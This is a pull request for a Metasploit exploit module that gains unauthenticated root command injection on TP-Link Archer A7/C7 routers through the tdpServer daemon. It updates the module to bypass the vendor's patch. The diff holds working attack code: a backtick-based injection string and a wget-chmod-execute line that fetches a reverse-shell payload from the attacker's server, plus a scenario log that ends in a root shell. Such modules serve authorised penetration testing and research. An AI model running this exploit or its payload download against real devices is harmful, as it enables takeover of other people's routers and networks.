### PR TITLE
Update TP-Link AC1750 Pwn2Own 2019 module

### DIFF
--- a/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md
+++ b/documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md
@@ -4,6 +4,8 @@ This module exploits a command injection vulnerability in the tdpServer daemon (
 The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.
 
 This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski).
+This module was updated in November 2020, after a bypass was discovered for the patch TP-Link issued. The new injection technique works on older firmware too. All firmware versions up to (but excluding) releases 201029 and 201030 are exploitable.
+
 
 ## Vulnerable Application
 
@@ -51,7 +53,7 @@ Payload options (linux/mipsbe/shell_reverse_tcp):
 ```
 
 ## Scenarios
-~~~
+```
 msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
 msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1
 RHOST => 192.168.0.1
@@ -90,4 +92,4 @@ id
 uid=0(root) gid=0(root)
 uname -a
 Linux ArcherC7v5 3.3.8 #1 Mon May 20 18:53:02 CST 2019 mips GNU/Linux
-~~~
+```

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -26,6 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
           as root, including downloading and executing a binary from another host.
           This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
           Radek Domanski).
+          This module was updated in November 2020, after a bypass was discovered for the patch TP-Link issued. The new
+          injection technique works on older firmware too. All firmware versions up to (but excluding) releases 201029 and
+          201030 are exploitable.
         },
         'License' => MSF_LICENSE,
         'Author' =>
@@ -38,9 +41,12 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
             [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
             [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2020/minesweeper.md'],
+            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2020/minesweeper.md'],
             [ 'CVE', '2020-10882'],
             [ 'CVE', '2020-10883'],
             [ 'CVE', '2020-10884'],
+            [ 'CVE', '2020-28347'],
             [ 'ZDI', '20-334'],
             [ 'ZDI', '20-335'],
             [ 'ZDI', '20-336' ]
@@ -57,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
           },
         'Targets' =>
           [
-            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)', {} ]
+            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)', {} ]
           ],
         'DisclosureDate' => '2020-03-25',
         'DefaultTarget' => 0
@@ -77,15 +83,41 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      res = send_request_cgi({
-        'uri' => '/webpages/app.1564127413977.manifest',
-        'method' => 'GET',
-        'rport' => 80
-      })
+    vuln_versions = [
+      # older versions not listed here are also vulnerable
+      "app.1575358240615.manifest",   # A7 191203
+      "app.1582117229115.manifest",   # A7 200220
+      "app.1595301495454.manifest",   # A7 200721
+      "app.1564127413977.manifest",   # C7 190726
+      "app.1593336984117.manifest",   # C7 201030
+    ]
 
-      if res && res.code == 200
-        return Exploit::CheckCode::Vulnerable
+    fixed_versions = [
+      "app.1603185012713.manifest",   # A7 201029
+      "app.1603240096315.manifest"    # C7 201030
+    ]
+
+    begin
+      for version in vuln_versions
+        res = send_request_cgi({
+          'uri' => "/webpages/#{version}",
+          'method' => 'GET',
+          'rport' => 80
+        })
+        if res && res.code == 200
+          return Exploit::CheckCode::Vulnerable
+        end
+      end
+
+      for version in fixed_versions
+        res = send_request_cgi({
+          'uri' => "/webpages/#{version}",
+          'method' => 'GET',
+          'rport' => 80
+        })
+        if res && res.code == 200
+          return Exploit::CheckCode::Safe
+        end
       end
     rescue ::Rex::ConnectionError
       pass
@@ -223,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
     encrypted
   end
 
-  def create_injection(c)
+  def create_injection(c, literal = false)
     # Template for the command injection
     # The injection happens at "slave_mac" (read advisory for details)
     # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
@@ -231,7 +263,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # This will fail if we send a command with single quotes (')
     # ... but that's not a problem for this module, since we don't use them for our command.
     # It might also fail with double quotes (") since this will break the JSON...
-    inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
+    if literal
+      inject = c
+    else
+      inject = "\'`printf \'#{c}\'>>#{@cmd_file}`\'"
+    end
 
     template = '{"method":"slave_key_offer","data":{'\
     "\"group_id\":\"#{rand_text_numeric(1..3)}\","\
@@ -270,8 +306,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def exec_cmd_file(packet)
     # This function handles special action of exec
     # Returns new complete tpdp packet
-    inject = "\';sh #{@cmd_file}\'"
-    payload = create_injection(inject)
+    inject = "\'`sh #{@cmd_file}`\'"
+    payload = create_injection(inject, true)
 
     ciphertext = aes_encrypt(payload)
     if !ciphertext
@@ -287,10 +323,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Handle incoming requests from the router
   def on_request_uri(cli, _request)
-    print_good("#{peer} - Sending executable to the router")
-    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
-    send_response(cli, @payload_exe)
-    @payload_sent = true
+    if not @payload_sent
+      print_good("#{peer} - Sending executable to the router")
+      print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
+      send_response(cli, @payload_exe)
+      @payload_sent = true
+    end
   end
 
   def exploit
@@ -317,12 +355,13 @@ class MetasploitModule < Msf::Exploit::Remote
     srv_host = datastore['SRVHOST']
     srv_port = datastore['SRVPORT']
     @cmd_file = rand_text_alpha_lower(1)
+    payload_file = rand_text_alpha_lower(1)
 
     # generate our payload executable
     @payload_exe = generate_payload_exe
 
     # Command that will download @payload_exe and execute it
-    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
+    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{payload_file};chmod +x #{payload_file};./#{payload_file}"
 
     http_service = 'http://' + srv_host + ':' + srv_port.to_s
     print_status("Starting up our web service on #{http_service} ...")
@@ -330,7 +369,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Proc' => proc do |cli, req|
         on_request_uri(cli, req)
       end,
-      'Path' => "/#{@cmd_file}"
+      'Path' => "/#{payload_file}"
     } })
 
     print_status("#{peer} - Connecting to the target")


### PR DESCRIPTION
This PR updates the TP-Link AC1750 Pwn2Own Tokyo 2019 module to slightly modify the injection technique.

The new modified technique allows bypass of a patch that TP-Link issued in early 2020. The vulnerability was discovered and intended to be used in Pwn2Own Tokyo 2020, but they smartened up and patched it (this time for good) just a few days ago in the latest firmware.

The module now works on both old and new firmware up to the patched version, and also improves firmware version detection for both the A7 and C7 routers.

For more details please see: https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2020/minesweeper.md